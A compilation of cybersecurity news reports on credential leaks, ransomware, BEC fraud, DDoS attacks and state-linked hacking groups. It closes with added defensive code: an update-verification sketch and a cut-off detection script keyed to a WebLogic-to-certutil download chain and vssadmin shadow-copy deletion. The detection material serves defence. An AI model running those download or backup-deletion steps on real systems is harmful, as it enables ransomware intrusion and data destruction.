
Logins and passwords of at least 1.2 million Russians have been leaked online

The credential verification service developed by cybersecurity company BI.ZONE (a subsidiary of Sberbank) has revealed that the logins and passwords of more than 1.2 million Russians are freely available online as a result of data leaks.

"BI.ZONE, a strategic digital risk management company, helped over one and a half million Russians check their credentials for leaks containing their usernames and open passwords. The owners of more than 1 million 200 thousand contacts could become potential victims," the company said.

Experts note that this information is available not only on the darknet but also on the normal Internet. At the same time, since it is freely available, attackers do not even need to buy it.

According to Anton Okoshkin, director of anti-fraud at BI.ZONE, many Russians reuse the same credentials across many sites, so a single leak can lead to the compromise of all of their accounts.

"In most cases, people use the same username and password on a variety of resources: from accounts in social networks and online stores to work services. In such a situation, if your account is compromised on one of them, the risk of hacking all accounts increases," Okoshkin noted.

At the same time, the expert noted that attackers usually begin automated verification of credentials on different services a few hours after the appearance of the leak in the public domain. "It is very important to promptly warn users about the compromise of their data," he stressed.

Almost 1.7 million Russians have already used BI.ZONE's credential verification service. The service checks against a set of 5 billion credentials that are known to have fallen into the hands of attackers and contain usernames and passwords. The leak database is updated weekly.

Russian hackers reportedly stole secret device blueprints from Apple

Hackers reportedly gained access to blueprints of the latest Apple developments by attacking the servers of the Taiwanese company Quanta Computer. The announcement of the results of the attack was made in Russian.

One of Apple's main suppliers, the Taiwanese company Quanta Computer, suffered a ransomware attack. The hackers demanded a payment of $50 million. Quanta Computer also manufactures products for HP, Facebook and Google's parent company Alphabet.

The attack was carried out by the REvil ransomware group, also known as Sodinokibi. The group announced its penetration of Quanta Computer's network on its darknet blog. On Sunday, a REvil spokesman known as Unknown said the ransomware group would soon announce "the largest attack in history"; the message was posted in Russian on a channel where the REvil group recruits new affiliates.

Quanta acknowledged the attack without explaining whether data was stolen.

According to the agency, REvil members tried to engage Quanta Computer in ransomware talks in the past week, ahead of Apple's first new product launch in 2021, which took place April 20.

A spokesman for the hackers claimed to have stolen and encrypted "all the local network data," demanding $50 million for the decryption key.

The hackers received a response two days later from a person who said he was "not responsible for the company," but wanted to find out the terms of the interaction. Two days later, a REvil spokesperson threatened to release data about new Apple products. This was followed by the first publication of images, which, according to the hackers, were working materials about new Apple laptops. The materials contained specific component serial numbers, dimensions and performance parameters detailing the many components inside an Apple laptop. One of the images was signed by Apple designer John Andreadis and dated March 9, 2021.

Now REvil is trying to get money from Apple: the group has demanded a ransom by May 1, and until then plans to keep publishing new files every day.

Apple declined to respond to questions about the hack.

Recall that on April 20 Apple held a presentation of its new products: a new generation of iMacs with processors of its own design, iPad Pro tablets, and AirTag tags for tracking the location of objects through an app.

Hackers attacked major Telegram channels via video on Yandex

On November 10, hackers conducted a major attack on popular Telegram channels. The administrators of the Reddit channel, which had 236 thousand subscribers, completely lost access to it. The attackers used an old scheme: they simply sent a Trojan-infected file to the administrators.

Hackers stole the Telegram channel of the Reddit forum, administrators could not log in to the control panel. The Telegram channel Baza was also attacked, but the attackers failed to gain access to the channel.

The hackers had the following scheme: they offered to buy advertising space, but first they asked to watch a video with their materials, which could be downloaded from Yandex.Disk. The document could not be opened on a mobile device, and hackers offered to download it to a desktop computer.

After launching the file, the owner of the Reddit channel with 236 thousand subscribers was no longer able to access it.

Artem Geller, General Director of the lab Studio.AG, explained that this is a very old fraud method, and that such files target Windows. Under various pretexts, hackers send material containing malware; if the victim opens the file, it gives them access to the entire operating system. In this particular case, the attackers were interested in Telegram, so the Reddit channel account was stolen.

Yandex.Disk cannot be blamed for missing the Trojan. According to Geller, about 300,000 new viruses appear every day worldwide, so it is simply impossible to catch them all. Moreover, it may not be a new virus but a modification of an old one. At the same time, the Trojan's purpose is not to destroy the computer system.

Cloud storage is convenient for fraudsters because, unlike email, they can upload a file of any size. Unprotected, unencrypted files without passwords are uploaded to this storage.

According to information security expert Alexander Vlasov, one thing must be remembered: those who provide a service for free never commit to protecting your files. Yes, they try to track malware, but only within the general bounds of their ecosystem.

Hackers Stole $2.3M, Wisconsin Republicans Claim

Wisconsin: Republican officials said that hackers stole $2.3m from the party's account being used to support Donald Trump's re-election. 

Following the discovery of the suspicious activity on 22nd October, the FBI was contacted to investigate the matter, according to statements by state party chairman Andrew Hitt. He also said that the state party had been warned about such cyberattacks in August, during the party's national convention.
 
The campaign invoices from four vendors were manipulated by the hackers to steal the funds, according to reports by the Associated Press. These vendors were being paid to send out direct mail and to hand out pro-Trump material such as hats in support of the Trump campaign.
 
The attackers apparently started with a phishing scam and then altered the invoices to redirect payments intended for the vendors to themselves, Mr. Hitt said. A party spokesman added that no data appeared to have been stolen. However, millions were taken from the Wisconsin Republicans' federal account.
 
According to Joe Tidy, BBC cyber-security reporter, "The information security world is tense right now waiting and watching for cyberattacks that could affect the US election." 
 
"It sounds like an almost standard case of something called Business Email Compromise (BEC). Effectively the hackers have either gained access to or spoofed an email address to put themselves between the Wisconsin Republican party HQ and one of their suppliers. The party then transferred the money to the hackers instead of its campaign partner," he said. 
 
"The reported hack comes as Mr. Trump and Democratic rival Joe Biden are both making a final push this week to secure Wisconsin ahead of the 3 November election." 
 
"There have also been hundreds of attempted attacks on the Wisconsin Democratic campaign, a spokeswoman told the Associated Press." 
 
"The Midwestern state is one of a handful of core battleground states - areas which could realistically go to the Republicans or Democrats - this election season. Candidates will need to win in several states like Wisconsin in order to win the presidency." He further added.

An IT expert at the Russian State Duma Explains Data Risks of Using VPN


"To prevent hackers from getting personal data of users, users don't need to use a VPN connection in their daily life", said Yevgeny Lifshits, a member of the expert council of the State Duma Committee on Information Policy, Information Technology and Communications.

He explained that a VPN is a virtual network that is supposed to protect the user's personal data from hackers, and that using it is assumed to let users maintain their privacy online. However, according to the expert, VPN services carry more danger than protection. According to Lifshits, such services are not needed in everyday life.

"Sometimes VPN services are necessary for work to transfer commercial data. In everyday life, they have no value."

According to the expert, if a person does not commit crimes that he wants to hide with a VPN, then he does not need to protect himself in this way. Otherwise, his passwords may end up in the hands of hackers.

"A user installing a VPN believes that he has secured himself, but the service provider may allow a data leak,” said Lifshitz. 

According to him, if the VPN service is unreliable, hackers can obtain the user's passwords and other personal data. The expert noted that there are now thousands of companies offering a secure connection, and an ordinary person can easily make a mistake in choosing a reliable one.

Earlier it was reported that the personal data of 20 million users of free VPN services were publicly available on the Internet. Experts found on the open server email addresses, smartphone model data, passwords, IP addresses, home addresses, device IDs, and other information with a total volume of 1.2 terabytes. It is noted that the leak occurred from networks such as UFO VPN, Fast VPN, Free VPN, Super VPN, Flash VPN, Secure VPN and Rabbit VPN. Some of them have millions of downloads from Google Play and the App Store and high ratings.

Russian hacker who hacked Dropbox and LinkedIn found guilty


Russian citizen Yevgeny Nikulin, accused of hacking LinkedIn eight years ago, was found guilty by a jury in San Francisco.

The verdict in Nikulin's case was announced on Friday after a trial that began in March, which was interrupted due to the coronavirus pandemic and resumed in July.

In 2016, there were a number of large-scale data leaks, and many dumps, including those of MySpace, LinkedIn, Tumblr and Vkontakte, were eventually put up for sale.
In 2016, one of the hackers, Russian citizen Yevgeny Nikulin, was arrested, and in 2017 he was extradited to the United States.

Nikulin was charged on a number of counts, all connected with penetrating other people's networks and stealing data. According to court documents, Nikulin hacked Dropbox, Formspring and LinkedIn in the spring and summer of 2012 and stole about 117,000,000 user records, including usernames, passwords and email addresses.

Nikulin then used the data stolen from LinkedIn to send phishing emails to employees of other companies. Authorities said that in this way Nikulin obtained information on 68,000,000 Dropbox users, including usernames, email addresses and hashed passwords.
Similarly, Nikulin got into the account of a Formspring engineer. In June 2012 he thereby gained access to the company's internal user database, which at that time held more than 30,000,000 records.

According to Radio Free Europe journalists, his activities were lucrative. Nikulin bought expensive cars and watches and travelled a lot. For example, Nikulin admitted that he owns a Lamborghini Huracán, a Bentley Continental GT and a Mercedes-Benz G-Class.

Nikulin's sentence will be announced on September 29. The jury took less than one day to reach a verdict. Nikulin faces up to 32 years in prison and fines exceeding a million dollars.
Lawyer Arkady Bukh said that the defense intends to challenge the verdict. According to him, the psychiatrist appointed by the judge had previously found Nikulin to be mentally unsound.
Nikulin has always denied guilt and even called the charges the United States' revenge for Russia granting political asylum to Edward Snowden.

The voting site of the United Russia party was attacked by hackers


"Initially, the voting went as usual. At seven in the morning, a rapid increase in attempts to vote began. After some time, technical support detected a DDoS attack — attempts were made to upload votes from non-existent voter IDs to the system," commented the press service of the party.
Deputy Secretary of the General Council of United Russia Sergey Perminov said that within two hours the flood of hundreds of thousands of fake requests was stopped. During that time, a queue of real people waiting to vote built up on the site.

"We use the blockchain to conduct preliminary voting — accordingly, all data comes to us in encrypted form and goes through several stages of verification. All ballots are anonymous — we don't have access to the personal information of the electors who sent them, which means we can't track the attack vector. Accordingly, we process all requests without exception. Therefore, we are now increasing our capacity in order not to lose any of the real votes," explained Perminov.

The Deputy Secretary noted that they managed to stop the attack within two hours, and the system is now gradually recovering. All the data of real electors who managed to vote has been recorded in the blockchain and will be available for verification. The integrity of the vote, according to him, has not been compromised.

It is worth noting that United Russia is the only party in the Russian Federation that conducts primaries to nominate candidates for elected posts. Any Russian citizen can participate. This year, due to the coronavirus pandemic, primaries are held in electronic format.

Recall that on May 23, Russian President Vladimir Putin signed a law on remote voting. According to the document, a new type of voting without a paper ballot is being introduced in the Russian Federation. Special software will be used instead.

Email of the Pskov Churchman Tikhon was hacked


Metropolitan Tikhon (Shevkunov), whom the media call "Vladimir Putin's confessor", has spoken about the hacking of his email. Blackmailers are now threatening to publish many years' worth of correspondence.

"A few months ago it turned out that my email was hacked for many years. My private and business correspondence began to be published on the Black Mirror website. In parallel, these materials were published on other telegram channels. I was asked to pay ten million rubles to suspend publication. I, of course, refused," said Tikhon.

The attackers, according to the clergyman, demanded 10 million rubles ($132,000) to suspend the publication. The Metropolitan replied to the hackers that he would put the entire contents of his mailbox in open access himself if they donated the same amount to the Pskov diocese.

Tikhon said that he did not want to "accept the terms of blackmailers and encourage dirty business." Shevkunov added that he did not pay attention to the hack at all and commented on it only because of many questions from the media. "I know that the competent authorities are looking for hackers, but whether they find them or not, we will see," said the Metropolitan.

"There is the COVID-19 virus, there are computer viruses, and there are such viruses in our society. They affect both those who steal other people's letters, wanting to make money on it and those who eagerly read other people's letters," stated the Churchman
Tikhon.

It is worth noting that letters from his hacked mailbox are still being published. In particular, an audio recording of his conversation with the filmmaker Nikita Mikhalkov was published recently.

Hackers attacked hospitals in the Czech Republic: Russia is suspected


According to the Lidové noviny newspaper, a foreign state may be behind the cyberattacks, and hacker groups from Russia may be involved.

"The organizer is a foreign country. It is beginning to become clear that Russia may be behind this. IP addresses lead there," a high-ranking officer who is part of the team of investigators told the newspaper. His words were confirmed by a member of the Czech Security Council.

Last week, hackers tried to hack into hospital networks in the Czech Republic. According to Health Minister Adam Vojtech, all attacks were repelled, "but other attacks may follow."

The attacks on the Czech Republic during the pandemic were mentioned in a speech last weekend by US Secretary of State Mike Pompeo. He warned that such attacks will not go unpunished.

"I highly appreciate the support of the United States and all its allies who are helping to ensure our country's cybersecurity. Cyberattacks on Czech medical institutions during the fight against the COVID-19 epidemic are similar to the behavior of hyenas. I hope our experts will soon find those who are interested in the defeat of the Czech Republic in the fight against infection,” said Czech Foreign Minister Tomas Petrsicek, in turn.

Meanwhile, the Ukrainian Embassy in the Czech Republic said that they condemn cyberattacks on Czech medical institutions, which is especially cynical during pandemics: "Ukraine, which has been facing Russia's war for six years, including the cyberwar, stands in solidarity with its Czech friends and will share its experience in fighting the aggressor."

The Russian Embassy on its Facebook page called the publications "fake news".

"In this regard, the Embassy of the Russian Federation in the Czech Republic would like to emphasize that parasitising the topic of the coronavirus epidemic ... goes beyond all possible moral and ethical limits."

Dozens of cyberattacks on the website of the Mayor of Moscow have been recorded since the beginning of February


Group-IB specialists recorded several DDoS attacks on Moscow electronic services, including the mos.ru portal. This was announced by the CEO of the company Ilya Sachkov.

As the head of the Moscow Government's IT department, Eduard Lysenko, reported, the site experienced more attacks in three hours than it had in the previous two quarters.
The cyber defense company Group-IB is currently working out who had an interest in carrying out massive attacks on government resources, and is looking for the perpetrators.

"The investigation has begun, our task is to understand the reasons for cyberattacks and find the perpetrators. At the moment, we can not provide details, this will interfere with the tasks of investigators", said the head of Group-IB, Ilya Sachkov.

According to him, the heavy load on the mos.ru website was also caused by the large number of pass requests from citizens. In addition, the outages were aggravated by Moscow residents' curiosity: many users visited the portal simply to explore it and understand how it works.

At the same time, Sachkov added, it is possible to ensure stable operation of mos.ru, even despite increased loads. “The portal experiences problems that are standard when launching large-scale services of this kind. Such services are tested for fault tolerance, security, and implementation quality in order to ensure stability and continuity of service.”

Recall that from March 30, Moscow introduced a regime of complete self-isolation. Residents of Moscow are allowed to leave the apartment only as a last resort. Starting April 15, they will need to have a special pass to travel around the city by public or private transport. Such measures are designed to stop the spread of coronavirus infection.

Earlier, E Hacking News reported that hackers hacked the digital Pass System of Moscow residents.

Experts warned of a wave of repeated attacks on victims of cyber fraud

Group-IB specialists have identified the spread of a popular scam online. The Double Deception scheme works as follows: people who have already become victims of Internet scams are offered assistance in obtaining compensation for the damage, after which the scammers steal their personal information, including bank card details.

"The scheme has several scenarios — scammers offer to refund money for participating in popular fake polls, give away or dishonest lotteries. In another case, they promise VAT compensation for expenses on the purchase of foreign goods: medicines and dietary supplements, clothes and shoes, food, fuel, building materials, household appliances, etc.,” said Group-IB.

Experts studied the workings of one of the fraudulent resources. As it turned out, behind it is a network of more than 170 domain names registered to a single person. Fraudsters often register their sites in the .xyz zone rather than .ru, which allows them to avoid being blocked quickly.

To attract victims, fraudsters use several methods. They send mass mailings via social networks, messengers and email, or use clones of popular media outlets. Group-IB experts gave an example headline from one such fake publication: "a 76-year-old pensioner received 170,000 rubles of VAT compensation and spent all the money on a stripper." From this page, users were redirected to a website where they were asked to calculate their VAT refund amount; to do so, the victim had to enter four digits of their bank card number. The final step of the scheme redirects the person seeking compensation to a chatbot, where the user is asked to talk to a "lawyer" who will help them get compensation, and finally to pay for that lawyer's services in order to receive the refund. As a result, the fraudsters obtain the victim's card details and debit their money.

Earlier, EHackingNews reported that, according to cybersecurity experts, attacks on the network perimeter of domestic companies have begun to grow. Hackers are trying to gain access to servers and get into the local network. This surge is caused by the transfer of employees to remote work.

Imperva Firewall Breached: Users' API Keys, SSL Certificates Exposed

Imperva, a leading security vendor, disclosed a security breach which exposed API keys, SSL certificates, scrambled passwords and email addresses for a subset of its customers using the Cloud Web Application Firewall (WAF) product.

Previously known as Incapsula, the Cloud WAF examines incoming requests to applications and blocks malicious activity.

The breach was reported to the California-based firm by a third party on August 20; the details of the disclosure are yet to be made public.

In conversation with Threatpost, Chris Morales, Head of Security Analytics at Vectra, said, "Losing SSL certificates and API access to an enterprise network is concerning. Secure web gateways, firewalls, intrusion detection, and prevention systems, and data loss prevention (DLP) products all perform some form of SSL intercept and decryption to perform DPI."

"While we often point to lack of maturity of security operations or misconfiguration of cloud systems as to why a company would miss an attack, it is even more unfortunate when a security vendor who builds a cloud security product is compromised that should have the skills and capabilities to detect and respond to cyberattacks," he added.

Quoting CEO Chris Hylen's statement: "We want to be very clear that this data exposure is limited to our Cloud WAF product… Elements of our Incapsula customer database through September 15, 2017, were exposed. These included: email addresses; hashed and salted passwords. And for a subset of the Incapsula customers through September 15, 2017: API keys and customer-provided SSL certificates."

Reassuring users, he said, "We continue to investigate this incident around the clock and have stood up a global, cross-functional team."

As a remedial measure, Imperva enforced password resets and 90-day password expiration for the product, which is a key component of the company's flagship application security solution.
Teen Hacker Elliott Gunton Taking Cryptocurrency for Stolen Data


In April 2018, Elliott Gunton, a teenager from Norwich, England, was arrested by the police on hacking charges, and his PC was seized by the authorities.

He was convicted at Norwich Crown Court, where he admitted five charges including illegal data exchanges, computer misuse and money laundering offences.

Gunton was given a three and a half year community order that barred him from using the internet and software, and he was ordered by the court to pay £407,359.

For stealing people's sensitive information and selling it for cryptocurrency worth thousands of pounds, Norwich Crown Court sentenced him to 20 months' imprisonment, and he was released on account of the time already spent on remand.

Examination of Gunton's computer showed that he had arranged the supply of people's stolen data, including their contact information, for malicious purposes such as fraudulent text messages.

At the age of 16, Gunton hacked a telecommunications firm and was found guilty of the same.

The teen made constant and sophisticated efforts to conceal his fraudulent acts and to hide the payments from the police, which is why he dealt in Bitcoin instead of hard currency. However, he left behind fragments of conversations in which he negotiated criminal deals.

Quoting a tweet Gunton posted last year: "Having lots of money is cool… but having lots of money without people knowing is cooler." He described himself as a "full-time crypto trader."

Cyber attacks on medical institutions have become more frequent in Russia


Kaspersky Lab has discovered a series of targeted attacks on large public health institutions in Russia.

The number of hacker attacks on Russian medical institutions has doubled this year. According to Kaspersky Lab, ten major Russian state medical institutions were attacked in spring 2019. The identity of the hackers is still unknown, but Kaspersky Lab believes that the attackers speak Russian fluently but are located outside the country.

The main purpose of the attackers is to collect financial documents, contracts for expensive treatment, invoices and other important documentation.

The computers were infected with the spyware CloudMid. Kaspersky Lab notes that this is "unique malware" that the company had not encountered before. CloudMid is sent by email, disguised as the VPN client of one of the Russian companies. Once installed, the program proceeds to collect documents from the infected computer; in particular, it takes screenshots several times a minute.

The mailing was not a mass campaign; only some organizations received the messages.

Kaspersky Lab anti-virus expert Dmitry Kuznetsov says: "Cyber attackers began to be interested in the health sector. In this case, the attacks were not well technically developed, but they were targeted, and the attackers still managed to get what they wanted."

Another expert at Kaspersky Lab, Alexey Shulmin, added that such attacks would be repeated.

Evgeny Gnedin, the head of the Analytics Department of Positive Technologies, said that hacker attacks on medical institutions are becoming a dangerous trend. The expert believes that the low level of security is primarily due to the insufficient allocation of funds for information security in medical organizations. So the attacks on medical institutions will remain relevant in the second half of 2019.

According to Andrey Arsentiev, analyst at the InfoWatch group of companies, cybercriminals have formed groups specializing in attacks on medical institutions, aimed primarily at extensive clinic networks holding large volumes of structured personal data on patients.

"Protected medical information is one of the most liquid information on the black market, the cost of one record in some cases can be hundreds or even thousands of dollars. In some other cases, hackers may be interested in research conducted in large medical centers, "said the expert.

Hackers attacked the Russian State exam system for two days


The days of the State exams are very important for 11th-grade students of Russian schools: their future depends on the results of the most important exam of their lives. It turned out that hackers wanted to influence the results of the final exams.

The Federal Education and Science Supervisory Department reported cyber attacks on the information systems of the Unified State Exam (USE). According to the Department, mass DDoS attacks on the servers that provide information exchange were recorded. The first attack was recorded on May 31, after the history and chemistry exams, and the hackers attacked again the next day.

According to Sergey Kravtsov, the Head of The Federal Education and Science Supervisory Department, hackers tried to disable the system of the Department, but the experts managed to maintain the regular work of servers and their accessibility to users.

It is important to note that such attacks are carried out to overload the server and make it unavailable by sending a large number of requests.

The cyber attacks did not cause problems for organizers or graduates. The hackers timed the attacks poorly, as the students had already taken the exams. Fortunately, the attacks did not affect the processing of the USE results.

Law enforcement agencies are already informed about the incident. Now they are looking for persons who organized the attack on the infrastructure of the Ministry of Education of the Russian Federation.

This year exams will continue until July 1. At the moment there is a chance that such attacks will be repeated. The Department reported that it is ready for them and will not allow any failures.

An interesting fact is that last year on the first day of the USE, May 29, hackers attacked the site of online monitoring of the exams. According to Lyubov Dukhanin, the Deputy Chairman of the State Duma Committee on Education and Science, the USE system has sufficient protection to ensure the safety of the exams. She added that it was the first such attack on the site that controls the Unified State Exam.

Durov accused the Russian authorities of trying to hack Telegram accounts of Ural journalists

On Friday night, unknown persons tried to hack the Telegram and Facebook accounts of well-known journalists in Yekaterinburg. Anton Olshannikov, Deputy Editor-in-Chief of "URA.RU", PR specialist Platon Mamatov and Natalia Vakhonina, Editor-in-Chief of the site "MSTROK" (mstrok.ru), were targeted by the unknown hacker. In addition, unknown persons attempted to gain access to the Telegram channel of the portal "Momenty" (https://tlg.name/s/momenty_ekb/3292). It is interesting to note that all of them actively wrote about the protests against the construction of the temple in Yekaterinburg.

The hackers tried to log into the journalists' accounts from a desktop computer whose IP address is registered in Spain, in Madrid. Two-factor authentication stopped them, but they did manage to obtain confirmation codes sent by SMS. One of the victims asked his mobile operator for clarification on how the attackers were able to obtain the code, but received the answer that the office does not "advise on these issues."

The journalists pointed out that they had all actively covered the protests over the construction of the Church of St. Catherine in the park near the Drama Theater in Yekaterinburg. From May 13 to 18, a number of unauthorized rallies of opponents and supporters of the cathedral took place in the public garden, and about 100 people were detained in four days. President Vladimir Putin then intervened and invited the local authorities to survey citizens about their attitude to the construction project. On May 22, the survey results were published, showing that the majority of Yekaterinburg residents (74%) oppose the construction of the temple.

Telegram's creator Pavel Durov said that the Russian authorities had tried to hack the Telegram accounts of Ural journalists. He linked the attack to the protests that continued in Yekaterinburg all last week.

“It reminds us that the authoritarian Government will stop at nothing to violate the privacy of its citizens,” wrote Pavel Durov in his Telegram channel. He emphasized that all hacking attempts failed.

Nigerian BEC Fraudsters Resorting to RATs as the Tool to Amplify Attacks



The number of Business Email Compromise (BEC) frauds has risen at an alarming rate, and the fraudsters have turned to Remote Access Trojans (RATs) to amplify their attacks.

The FBI's Internet Crime Complaint Center (IC3) has tried to reduce the damage done by these attacks by forming a Recovery Asset Team that deals with the consequences of BEC scams. However, the number of scammers involved in these attacks is greater than ever before.

The attacks, which have seen an unprecedented upsurge, are regarded as a global threat, with Nigeria practising them extensively; in that country, making money via BEC scams has become the norm. Examining cybercrime in Nigeria, Palo Alto Networks' Unit 42 recorded the country's evolution toward employing ransomware and other malware to reach financial objectives.

In 2018, the number of groups involved in BEC scams reached 400, a hundred more than the previous year, and their activity grew by 54% compared to 2017.

With a monthly average of 28,227 attacks, the most affected sector was high-tech, which recorded over 120,000 attacks in the previous year; the second most targeted was the wholesale industry, with around 80,000 attacks, and the third was manufacturing, with a total of 57,000 attacks.

Monitoring the attacks, Verizon says in a report, “Given the sheer number of incidents in this sector, you would think that the government incident responders must either be cape and tights wearing superheroes, or so stressed they’re barely hanging on by their fingernails.”

“Admittedly we do not have as much data as to what is happening beyond the deception and initial device compromise. The inclusion of keylogging malware is a good indicator that additional credential theft and reuse is a likely next step.”



Buckeye APT hackers stole the NSA hacking tools before Shadow Brokers leaked these tools




Buckeye, a Chinese state-sponsored APT group, was using Equation Group tools that the Shadow Brokers leaked in 2017 more than a year before the leak took place.

The Shadow Brokers is a mysterious group of hackers who stole malware, hacking tools and zero-day exploits from the Equation Group, which is linked to the NSA and is one of the most advanced cyber attack groups in the world.

Active since 2009, the Buckeye group, also known as APT3, used these tools to carry out multiple attacks against a number of organizations on its target list, in order to gain unauthorized access to organizations based mainly in the United States.

Buckeye was already exploiting zero-day vulnerabilities in 2014; a couple of years later it used a custom exploit tool, Trojan.Bemstour, to reach its targets.

To achieve remote kernel code execution on victims' computers, Bemstour exploited two Windows vulnerabilities, CVE-2019-0703 and CVE-2017-0143. The first was a zero-day at the time of the attacks; the second is the same flaw exploited by EternalRomance and EternalSynergy, two NSA-owned exploit tools that were also part of the Shadow Brokers leak.

According to the findings of the Symantec report: “Bemstour is specifically designed to deliver a variant of the DoublePulsar backdoor. DoublePulsar is then used to inject a secondary payload, which runs in memory only. The secondary payload enables the attackers to access the affected computer even after DoublePulsar is removed.”

“The variant of DoublePulsar used in the first attacks performed by Buckeye was different to that leaked by the Shadow Brokers. It appears to contain code to target newer versions of Windows (Windows 8.1 and Windows Server 2012 R2), indicating that it is a newer version of the malware.”






A Hacker Group, 'Barium' on a Supply Chain Hijacking Spree



One of the most damaging forms of hacking is a software supply chain attack: it involves illicitly accessing a developer's network and placing malicious code into the software updates and applications that users trust the most.

In a single attempt, supply chain hackers can potentially place their malware onto thousands or millions of computer systems without leaving a single trace of malicious activity. Over time, this trick has gained traction and has become more advanced and harder to detect. Supply chain attacks follow a similar pattern and have been used by the groups behind them as their core tool.

Supply chain attacks exploit software distribution channels, and over the last three years such attacks have mostly been linked to one group of Chinese hackers, known variously as ShadowHammer, Barium, Wicked Panda and ShadowPad, depending on the security firm.
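As an added example, not code from the original article or from any vendor mentioned in it, the following Python sketches the client-side checks an update mechanism performs, the checks a supply-chain attacker has to defeat or bypass: manifest authentication, freshness, anti-rollback, and a pinned hash of the artifact. All names, keys, version numbers and update bytes are constructed, and an HMAC with a pinned key stands in for the vendor's public-key signature so that the example runs with the standard library only.

```python
import hashlib
import hmac
import json
from typing import Dict

# Client-side pinned state, shipped with the installer rather than fetched
# from the update channel an attacker may control (constructed values).
PINNED_KEY = b"constructed-vendor-signing-key"  # stand-in for a pinned public key
INSTALLED_VERSION = 4                            # persisted by the client
NOW = 1_700_000_000                              # fixed clock for reproducibility


def canonical(manifest: Dict) -> bytes:
    """Deterministic encoding so signer and verifier hash identical bytes."""
    return json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()


def sign_manifest(manifest: Dict, key: bytes) -> str:
    """Vendor side. HMAC stands in for an asymmetric signature in this example."""
    return hmac.new(key, canonical(manifest), hashlib.sha256).hexdigest()


def verify_update(update: bytes, manifest: Dict, signature: str,
                  key: bytes = PINNED_KEY,
                  installed_version: int = INSTALLED_VERSION,
                  now: int = NOW) -> str:
    """Return "ok" or the name of the first failed check.

    Order matters: nothing in the manifest is trusted until its signature has
    been checked, and the artifact hash comes last because it is only
    meaningful once the manifest itself is authentic and current."""
    if not hmac.compare_digest(sign_manifest(manifest, key), signature):
        return "bad_signature"   # manifest not produced by the key holder
    if manifest["expires"] < now:
        return "expired"         # old manifest replayed after its lifetime
    if manifest["version"] <= installed_version:
        return "rollback"        # downgrade to a build with known holes
    if not hmac.compare_digest(hashlib.sha256(update).hexdigest(), manifest["sha256"]):
        return "hash_mismatch"   # binary swapped on the distribution server
    return "ok"


def make_manifest(version: int, update: bytes, expires: int = 4_102_444_800) -> Dict:
    """Vendor side: describe an artifact (default expiry 2100-01-01, constructed)."""
    return {"version": version, "expires": expires,
            "sha256": hashlib.sha256(update).hexdigest()}


# Constructed scenario material.
GOOD_UPDATE = b"genuine installer bytes, version 5"
TAMPERED_UPDATE = GOOD_UPDATE + b" + implant"
OLD_UPDATE = b"genuine installer bytes, version 3"
GOOD_MANIFEST = make_manifest(5, GOOD_UPDATE)
GOOD_SIGNATURE = sign_manifest(GOOD_MANIFEST, PINNED_KEY)


def run_scenarios() -> Dict[str, str]:
    """Five deliveries a client might receive and what the checks report."""
    # Attacker replaced the binary on a mirror but cannot re-sign the manifest.
    swapped = (TAMPERED_UPDATE, GOOD_MANIFEST, GOOD_SIGNATURE)
    # Attacker also serves a manifest matching the implant, signed with a key
    # the client does not trust.
    forged_manifest = make_manifest(5, TAMPERED_UPDATE)
    forged = (TAMPERED_UPDATE, forged_manifest,
              sign_manifest(forged_manifest, b"attacker-key"))
    # Attacker replays a genuinely signed but older release.
    old_manifest = make_manifest(3, OLD_UPDATE)
    replay = (OLD_UPDATE, old_manifest, sign_manifest(old_manifest, PINNED_KEY))
    # Attacker replays a genuine manifest whose lifetime has passed.
    stale_manifest = make_manifest(5, GOOD_UPDATE, expires=NOW - 1)
    stale = (GOOD_UPDATE, stale_manifest, sign_manifest(stale_manifest, PINNED_KEY))
    return {
        "genuine": verify_update(GOOD_UPDATE, GOOD_MANIFEST, GOOD_SIGNATURE),
        "binary_swapped": verify_update(*swapped),
        "forged_manifest": verify_update(*forged),
        "version_replay": verify_update(*replay),
        "stale_manifest": verify_update(*stale),
    }


if __name__ == "__main__":
    for name, result in run_scenarios().items():
        print(f"{name:16s} -> {result}")
```

None of these checks help when the attacker obtains the vendor's signing key or inserts code before the build is signed, which is the poisoning of trusted mechanisms that Kamluk describes below; that is why custody of signing keys and integrity of the build pipeline matter as much as the client-side verification.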

The trick demonstrates the group's potential to compromise computer systems on a massive scale by exploiting weaknesses in the fundamental model that governs which code users run on their systems; this capability of Barium is a matter of great concern for security researchers.

Vitaly Kamluk, director of the Asia research team at security firm Kaspersky, put it this way: "They're poisoning trusted mechanisms. They're the champions of this. With the number of companies they've breached, I don't think any other groups are comparable to these guys."

"When they abuse this mechanism, they’re undermining trust in the core, foundational mechanisms for verifying the integrity of your system,"

"This is much more important and has a bigger impact than regular exploitation of security vulnerabilities or phishing or other types of attacks. People are going to stop trusting legitimate software updates and software vendors."

Asked about the group, security researcher Marc-Etienne Léveillé said: "In terms of scale, this is now the group that is most proficient in supply chain attacks."

"We've never seen anything like this before. It's scary because they have control over a very large number of machines."

"If [Barium] had deployed a ransomware worm like that through one of these attacks, it would be a far more devastating attack than NotPetya," said another expert on the matter.






Attackers Exploiting Oracle Weblogic Server Vulnerability to Encrypt User Data



Attackers are exploiting a remote code execution vulnerability in Oracle WebLogic Server to install a new variant of the ransomware known as "Sodinokibi".

The vulnerability, recently discovered in Oracle WebLogic Server versions 10.3.6.0 and 12.1.3.0, allows an unauthenticated attacker with HTTP access to the server to execute arbitrary code.
Reportedly, a patch was issued by the software company on April 26.

The attacks began around April 25, and on the next day, April 26, the attackers established connections to multiple vulnerable HTTP servers, according to the findings of Cisco Talos.

The attackers exploited the vulnerability to download copies of the malware from servers under their control, repurposing legitimate system utilities to fetch and run it.

“Cisco IR Services and Talos observed the attack requests originating from 130.61.54[.]136 and the attackers were ultimately successful at encrypting a number of customer systems.”

How does the ransomware infect?

It begins with an HTTP POST request to the vulnerable server that carries a certutil command, which downloads the malicious file and then executes it.

Once the malicious process starts, it invokes the vssadmin.exe utility, which manages Windows Volume Shadow Copies, the point-in-time snapshots that Windows relies on for automatic and manual backups and restore points.

The ransomware uses it to hinder recovery: by deleting those shadow copies it removes the backup mechanism from which the victim could otherwise restore files.
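The chain described above, as an added detection example that is not part of the original article or of the Talos report: the Python below classifies Windows process-creation events (fields modelled on Sysmon Event ID 1) and reports hosts where the WebLogic JVM spawned a certutil download that was later followed by shadow-copy deletion. The events, hostnames, paths and URLs are constructed; the assumptions that the WebLogic process appears as java.exe and that vssadmin is invoked in its `delete shadows` form are marked in the code.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional


@dataclass
class ProcEvent:
    """One process-creation record (the fields Sysmon Event ID 1 or EDR
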